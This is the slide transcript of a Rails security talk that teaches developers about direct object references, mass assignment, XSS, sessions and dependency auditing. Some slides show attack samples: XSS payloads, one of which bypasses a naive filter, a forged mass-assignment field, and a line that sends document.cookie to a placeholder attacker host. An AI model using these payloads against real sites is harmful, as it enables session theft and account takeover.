Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Rails Security TL;DR (v2)

Andrew Kampjes
June 24, 2015
Programming
0
130

Rails Security TL;DR (v2)

Presentation that I gave at the Wellrailed meetup. This is a uber-condensed version of what Rails devs need to be thinking about when writing applications and how they can fit security into their development practices.

This version has some learnings from my working with development teams at safestack.io

Andrew Kampjes

June 24, 2015
Tweet

More Decks by Andrew Kampjes

See All by Andrew Kampjes
Suprise Features in your Favorite Framework
akampjes
1
3k
Rails Security TL;DR
akampjes
1
2.9k

Other Decks in Programming

See All in Programming
[Do iOS '24] Ship your app on a Friday...and enjoy your weekend!
polpielladev
0
110
最新TCAキャッチアップ
0si43
0
200
Macとオーディオ再生 2024/11/02
yusukeito
0
380
Modular Monolith Monorepo ~シンプルさを保ちながらmonorepoのメリットを最大化する~
yuisakamoto
5
350
Hotwire or React? ~アフタートーク・本編に含めなかった話~ / Hotwire or React? after talk
harunatsujita
1
120
Jakarta EE meets AI
ivargrimstad
0
670
ヤプリ新卒SREの オンボーディング
masaki12
0
130
Jakarta EE meets AI
ivargrimstad
0
290
Figma Dev Modeで変わる!Flutterの開発体験
watanave
0
150
AI時代におけるSRE、
あるいはエンジニアの生存戦略
pyama86
6
1.2k
デザインパターンで理解するLLMエージェントの作り方 / How to develop an LLM agent using agentic design patterns
rkaga
3
390
3rd party scriptでもReactを使いたい! Preact + Reactのハイブリッド開発
righttouch
PRO
1
610

Featured

See All Featured
StorybookのUI Testing Handbookを読んだ
zakiyama
27
5.3k
Side Projects
sachag
452
42k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
Making Projects Easy
brettharned
115
5.9k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
44
2.2k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
250
21k
How to train your dragon (web standard)
notwaldorf
88
5.7k
We Have a Design System, Now What?
morganepeng
50
7.2k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
6.9k
Six Lessons from altMBA
skipperchong
27
3.5k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.1k

Transcript

  1. Rails Security TL;DR @akampjes [email protected]

  2. None

  3. We all want to be better developers

  4. Because it’s fun and interesting

  5. “No-one said it had to be secure”

  6. None

  7. The Gartner Group estimates that 75% of attacks are at

    the web application layer, and found out: "that out of 300 audited sites, 97% are vulnerable to attack".

  8. Security is really HARD

  9. Github

  10. None

  11. Direct Object Reference

  12. None

  13. http://foo.com/orders/123

  14. Computers are fast

  15. http://foo.com/orders/123 http://foo.com/orders/124 … http://foo.com/orders/12345

  16. Don’t write this code: raise "nope" unless order.user == current_user

  17. Use pundit, cancan etc. https://www.ruby-toolbox. com/categories/rails_authorization

  18. Bonus: Use UUID for pkeys 128bits == BIG

  19. Mass Assignment

  20. Order.update(params)

  21. Github

  22. def update @key = PublicKey.find params[:public_key]['id'] @key.update params[:pubilc_key] end #

    Oh no! We passed public_key[user_id] of our victim!

  23. <input value=”ssh-rsa…” name=public_key[key]> <input value=USER_ID name=public_key[user_id]>

  24. strong params attr_accessable

  25. params.permit! :’(

  26. Context of use AdminUser vs RegularUser

  27. Cross Site Scripting (XSS)

  28. Running scripts on user’s computer

  29. Can do anything that the user can do

  30. <script>alert(1)</script>

  31. s/<\/?script>//

  32. <script<script>>alert(1)</script</script>>

  33. message posts, user comments, guest books, project titles, document names,

    search, urls, server headers, banner ads

  34. $.get('http://hacker.io?d='+document.cookie)

  35. Any unescaped or unsanitized javascript

  36. Old rails (2ish) you had to remember to escape. Each.

    Fucking. Input.

  37. html_safe() raw() h()

  38. SQL Injection

  39. Just kidding Solved problem* * http://rails-sqli.org/

  40. Sessions

  41. Defaults to Cookiestore

  42. SerializedObjects+HMAC (pre-rails4)

  43. Sensitive data

  44. Encrypt(SerializedObjects)+HMAC (rails4+)

  45. No Server Side logout

  46. Don’t use Cookiestore or...

  47. ...don’t trust data in session

  48. Don’t lose your secret_token or secret_key_base

  49. There’s a gem for that: CacheStore ActiveRecordStore MemCacheStore

  50. Finally

  51. Story time! As a hacker, I want to modify my

    order total, so that I can get free things.

  52. “Don't put off until tomorrow what you can do today”

    Ben Franklin on updates

  53. bundler-audit https://gemcanary.com/ https://gemnasium.com/

  54. manual: Code Review

  55. really easy: Brakeman

  56. Idealy: Write your own security tests

  57. Security issues crop up when we leave the beaten path.

  58. We can compensate by understanding why and how.

  59. Moar resources

  60. • http://guides.rubyonrails.org/security. html • https://www.owasp.org/index. php/Top_10_2013-Top_10 • http://railssecurity.com/ • http://www.happybearsoftware.

    com/rails-security-fundamentals • https://github.com/cktricky/railsgoat

  61. https://safestack.io/training.html

  62. Contact me, questions, comments @akampjes [email protected]